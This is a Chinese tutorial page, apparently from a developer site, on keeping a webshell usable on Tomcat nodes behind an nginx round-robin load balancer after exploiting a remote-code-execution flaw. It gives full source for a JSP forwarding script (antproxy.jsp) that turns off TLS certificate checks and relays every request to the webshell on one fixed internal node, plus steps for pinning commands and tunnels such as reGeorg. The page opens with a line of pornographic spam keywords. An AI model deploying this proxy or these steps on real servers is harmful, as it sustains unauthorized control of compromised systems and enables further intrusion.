欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

nginx負(fù)載均衡下的webshell上傳的實(shí)現(xiàn)

 更新時(shí)間:2023年03月03日 10:45:37   作者:努力學(xué)IT的小徐  
本文主要介紹了nginx負(fù)載均衡下的webshell上傳的實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧

場景描述

假定在真實(shí)生產(chǎn)環(huán)境中,存在一個(gè)RCE漏洞,可以讓我們獲取WebShell

環(huán)境的安裝

首先在GetHub上拉去漏洞的鏡像前,需提前在centos上安裝nginx和tomcat以及配置好nginx以及tomcat的相關(guān)配置文件,在使用docker將鏡像拉取下來,進(jìn)行漏洞的復(fù)現(xiàn)。

1、先將docker環(huán)境搭建起來

2、測試tomcat是否可以訪問

 根據(jù)上圖可以看出,后端的tomcat是可以訪問的

3、查看docker中nginx反向代理的負(fù)載均衡

4、查看docker中l(wèi)bsnode1中的ant.jsp文件

此文件可以理解為一句話木馬,在lbsnode2中也是存有相同的文件

lbsnode1:

 lbsnode2:

5、通過中國蟻劍來連接ant.jsp文件

 因?yàn)閮膳_節(jié)點(diǎn)都在相同的位置存在 ant.jsp,所以連接的時(shí)候也沒出現(xiàn)什么異常

復(fù)現(xiàn)過程

存在的問題

問題一:由于nginx采用的反向代理是輪詢的方式,所以上傳文件必須在兩臺后端服務(wù)器的相同位置上傳相同的文件

因?yàn)槲覀兪欠聪虼淼呢?fù)載均衡,就存在上傳文件出現(xiàn)一臺后端服務(wù)器上有我們上傳的文件,另一臺服務(wù)器上沒有我們上傳的文件,出現(xiàn)的結(jié)果就是,一旦一臺服務(wù)器上沒有,那么在請求輪到這臺服務(wù)器的時(shí)候,就會報(bào)出404的錯(cuò)誤,從而影響使用,這也就是一會出現(xiàn)正常,一會出現(xiàn)錯(cuò)誤的原因。

解決方案:

我們需要在每一臺節(jié)點(diǎn)的相同位置都上傳相同內(nèi)容的WebShell,從而實(shí)現(xiàn)無論是輪詢到哪臺服務(wù)器上都可以訪問到我們的后端服務(wù)器上。實(shí)現(xiàn)每一臺后端服務(wù)器上都有上傳的文件,就需要瘋狂上傳。

問題二:我們在執(zhí)行命令時(shí),無法知道下次的請求交給哪臺機(jī)器去執(zhí)行

我們在執(zhí)行hostname -i查看當(dāng)前執(zhí)行機(jī)器的IP時(shí),可以看到IP地址一直在漂移

問題三:當(dāng)我們需要上傳一些較大的工具時(shí),會造成工具無法使用的情況

當(dāng)我們上傳一個(gè)較大的文件時(shí),由于AntSword上傳文件時(shí),采用的是分片上傳方式,把一個(gè)文件分成了多次HTTP請求發(fā)送給目標(biāo),造成文件的一部分內(nèi)容在A這臺服務(wù)器上,另一部分文件在B這臺服務(wù)器上,從而使得較大的工具或者文件無法打開或者使用

問題四:由于目標(biāo)主機(jī)不能出外網(wǎng),想要進(jìn)一步深入,只能使用reGeorg/HTTPAbs 等 HTTP Tunnel,可在這個(gè)場景下,這些 tunnel 腳本全部都失靈了。

解決方案

方案一:關(guān)掉其中的一臺后端服務(wù)器

關(guān)閉后端其中的一臺服務(wù)器確實(shí)能夠解決上述的四種問題,但是這個(gè)方案實(shí)在是“老壽星上吊---活膩了”,影響業(yè)務(wù),還會造成災(zāi)難,直接Pass不考慮

綜合評價(jià):真是環(huán)境下千萬不要嘗試!?。?/strong>

方案二:在程序執(zhí)行前先判斷要不要執(zhí)行

既然無法預(yù)測下一次是哪臺機(jī)器去執(zhí)行,那我們的shell在執(zhí)行Payload之前,先判斷一下要不要執(zhí)行不就可以了。

首次按創(chuàng)建一個(gè)腳本demo.sh,該腳本是獲取我們的后端其中一臺服務(wù)器的地址,匹配到這臺服務(wù)器的地址才進(jìn)行程序的執(zhí)行,匹配到另一臺服務(wù)器則不進(jìn)行程序的執(zhí)行。

通過中國蟻劍將demo.sh腳本文件上傳到后端的兩臺服務(wù)器上,因?yàn)槭秦?fù)載均衡,所以需要瘋狂點(diǎn)擊上傳

 這樣一來,確實(shí)能夠保證執(zhí)行的命令是在我們想要的機(jī)器上了,可是這樣執(zhí)行命令,沒有一絲美感,另外,大文件上傳、HTTP隧道這些問題也沒有解決。

綜合評價(jià):該方案勉強(qiáng)能用,僅適合在執(zhí)行命令的時(shí)候用,不夠優(yōu)雅。

方案三:在Web層做一次HTTP流量的轉(zhuǎn)發(fā)(重點(diǎn))

沒錯(cuò),我們用 AntSword 沒法直接訪問 LBSNode1 內(nèi)網(wǎng)IP(172.23.0.2)的 8080 端口,但是有人能訪問呀,除了 nginx 能訪問之外,LBSNode2 這臺機(jī)器也是可以訪問 Node1 這臺機(jī)器的 8080 端口的。

還記不記得 「PHP Bypass Disable Function」 這個(gè)插件,我們在這個(gè)插件加載 so 之后,本地啟動了一個(gè) httpserver,然后我們用到了 HTTP 層面的流量轉(zhuǎn)發(fā)腳本 「antproxy.php」, 我們放在這個(gè)場景下看:

 我們一步一步來看這個(gè)圖,我們的目的是:所有的數(shù)據(jù)包都能發(fā)給「LBSNode 1」這臺機(jī)器

首先是 第 1 步,我們請求 /antproxy.jsp,這個(gè)請求發(fā)給 nginx

nginx 接到數(shù)據(jù)包之后,會有兩種情況:

我們先看黑色線,第 2 步把請求傳遞給了目標(biāo)機(jī)器,請求了 Node1 機(jī)器上的 /antproxy.jsp,接著 第 3 步,/antproxy.jsp 把請求重組之后,傳給了 Node1 機(jī)器上的 /ant.jsp,成功執(zhí)行。

再來看紅色線,第 2 步把請求傳給了 Node2 機(jī)器, 接著第 3 步,Node2 機(jī)器上面的 /antproxy.jsp 把請求重組之后,傳給了 Node1 的 /ant.jsp,成功執(zhí)行。

1、創(chuàng)建 antproxy.jsp 腳本

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
  public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }
    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            public X509Certificate[] getAcceptedIssuers() {
                return null;
            }
            @Override
            public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
            @Override
            public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
        } };
        try {
            SSLContext sc = SSLContext.getInstance("TLS");
            sc.init(null, trustAllCerts, new java.security.SecureRandom());
            HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        } catch (KeyManagementException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
%>
<%
        String target = "http://172.24.0.2:8080/ant.jsp";
        URL url = new URL(target);
        if ("https".equalsIgnoreCase(url.getProtocol())) {
            ignoreSsl();
        }
        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        StringBuilder sb = new StringBuilder();
        conn.setRequestMethod(request.getMethod());
        conn.setConnectTimeout(30000);
        conn.setDoOutput(true);
        conn.setDoInput(true);
        conn.setInstanceFollowRedirects(false);
        conn.connect();
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        OutputStream out2 = conn.getOutputStream();
        DataInputStream in=new DataInputStream(request.getInputStream());
        byte[] buf = new byte[1024];
        int len = 0;
        while ((len = in.read(buf)) != -1) {
            baos.write(buf, 0, len);
        }
        baos.flush();
        baos.writeTo(out2);
        baos.close();
        InputStream inputStream = conn.getInputStream();
        OutputStream out3=response.getOutputStream();
        int len2 = 0;
        while ((len2 = inputStream.read(buf)) != -1) {
            out3.write(buf, 0, len2);
        }
        out3.flush();
        out3.close();
%>

2、修改轉(zhuǎn)發(fā)地址,轉(zhuǎn)向目標(biāo) Node 的內(nèi)網(wǎng)IP的 目標(biāo)腳本 訪問地址。

注意:不僅僅是 WebShell 喲,還可以改成 reGeorg 等腳本的訪問地址

我們將 target 指向了 LBSNode1 的 ant.jsp

注意:

a) 不要使用上傳功能,上傳功能會分片上傳,導(dǎo)致分散在不同 Node 上。

b) 要保證每一臺 Node 上都有相同路徑的 antproxy.jsp, 所以我瘋狂保存了很多次,保證每一臺都上傳了腳本

3、 修改 Shell 配置, 將 URL 部分填寫為 antproxy.jsp 的地址,其它配置不變

4、 測試執(zhí)行命令, 查看 IP

 可以看到 IP 已經(jīng)固定, 意味著請求已經(jīng)固定到了 LBSNode1 這臺機(jī)器上了。此時(shí)使用分片上傳、HTTP 代理,都已經(jīng)跟單機(jī)的情況沒什么區(qū)別了

該方案的優(yōu)點(diǎn):

1、低權(quán)限就可以完成,如果權(quán)限高的話,還可以通過端口層面直接轉(zhuǎn)發(fā),不過這跟 Plan A 的關(guān)服務(wù)就沒啥區(qū)別了

2、流量上,只影響訪問 WebShell 的請求,其它的正常業(yè)務(wù)請求不會影響。

3、適配更多工具

缺點(diǎn):

該方案需要「目標(biāo) Node」和「其它 Node」 之間內(nèi)網(wǎng)互通,如果不互通就涼了。

到此這篇關(guān)于nginx負(fù)載均衡下的webshell上傳的實(shí)現(xiàn)的文章就介紹到這了,更多相關(guān)nginx負(fù)載均衡webshell上傳內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Nginx中break與last的區(qū)別詳析

    Nginx中break與last的區(qū)別詳析

    這篇文章主要給大家介紹了關(guān)于Nginx中break與last區(qū)別的相關(guān)資料,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2021-01-01
  • Nginx配置SSL證書的方法步驟

    Nginx配置SSL證書的方法步驟

    本文主要介紹了Nginx配置SSL證書,成功配置SSL證書后,您將能夠通過HTTPS加密通道安全訪問Nginx服務(wù)器,感興趣的可以了解一下
    2024-02-02
  • Nginx服務(wù)器下防盜鏈的方法介紹

    Nginx服務(wù)器下防盜鏈的方法介紹

    這篇文章主要介紹了Nginx服務(wù)器下防盜鏈的方法介紹,主要通過修改服務(wù)器的配置文件來實(shí)現(xiàn),需要的朋友可以參考下
    2015-07-07
  • 服務(wù)器報(bào)錯(cuò)nginx?502?Bad?Gateway的原因及如何解決詳解

    服務(wù)器報(bào)錯(cuò)nginx?502?Bad?Gateway的原因及如何解決詳解

    項(xiàng)目啟動時(shí)莫名其妙網(wǎng)站訪問不了,502 Bad Gateway,下面這篇文章主要給大家介紹了關(guān)于服務(wù)器報(bào)錯(cuò)nginx?502?Bad?Gateway的原因及如何解決的相關(guān)資料,文中通過實(shí)例代碼介紹的非常詳細(xì),需要的朋友可以參考下
    2023-06-06
  • 配置Nginx的防盜鏈的操作方法

    配置Nginx的防盜鏈的操作方法

    這篇文章主要介紹了配置Nginx的防盜鏈的操作方法,本文通過實(shí)例代碼給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2019-05-05
  • Nginx文件已經(jīng)存在全局反向代理問題排查記錄

    Nginx文件已經(jīng)存在全局反向代理問題排查記錄

    反向代理除了實(shí)現(xiàn)負(fù)載均衡之外,還提供如緩存來減少上游服務(wù)器的壓力,下面這篇文章主要給大家介紹了關(guān)于Nginx文件已經(jīng)存在全局反向代理問題排查的相關(guān)資料,需要的朋友可以參考下
    2022-07-07
  • Nginx啟動成功卻無法訪問網(wǎng)頁的問題分析和解決方案(完整的排除方案)

    Nginx啟動成功卻無法訪問網(wǎng)頁的問題分析和解決方案(完整的排除方案)

    我是用的阿里云的服務(wù)器,所以我的問題就在于阿里云服務(wù)器必須單獨(dú)開端口,在找到這個(gè)問題之前,我已經(jīng)把所有能試的方法試過了一遍都沒有問題,在增加端口之后直接成功了,如果你也遇到了這樣的問題,就和我一起排除吧
    2023-12-12
  • 加速nginx性能: 開啟gzip和緩存

    加速nginx性能: 開啟gzip和緩存

    nginx 是一個(gè)高性能的 Web 服務(wù)器,之前也寫過一些關(guān)于 nginx 的文章。為了提高博客的響應(yīng)速度,可以從設(shè)置 nginx 的 gzip 和緩存這2方面入手。為字體開啟 gzip 和緩存能大大減少帶寬的消耗
    2017-03-03
  • Nginx概述、命令、配置文件和具體應(yīng)用詳解

    Nginx概述、命令、配置文件和具體應(yīng)用詳解

    Nginx是一款輕量級的web 服務(wù)器/反向代理服務(wù)器及電子郵件(IMAP/POP3)代理服務(wù)器,這篇文章主要介紹了Nginx概述、命令、配置文件和具體應(yīng)用,需要的朋友可以參考下
    2023-08-08
  • Nginx 域名轉(zhuǎn)發(fā)的實(shí)現(xiàn)

    Nginx 域名轉(zhuǎn)發(fā)的實(shí)現(xiàn)

    這篇文章主要介紹了Nginx 域名轉(zhuǎn)發(fā)的實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2019-08-08

最新評論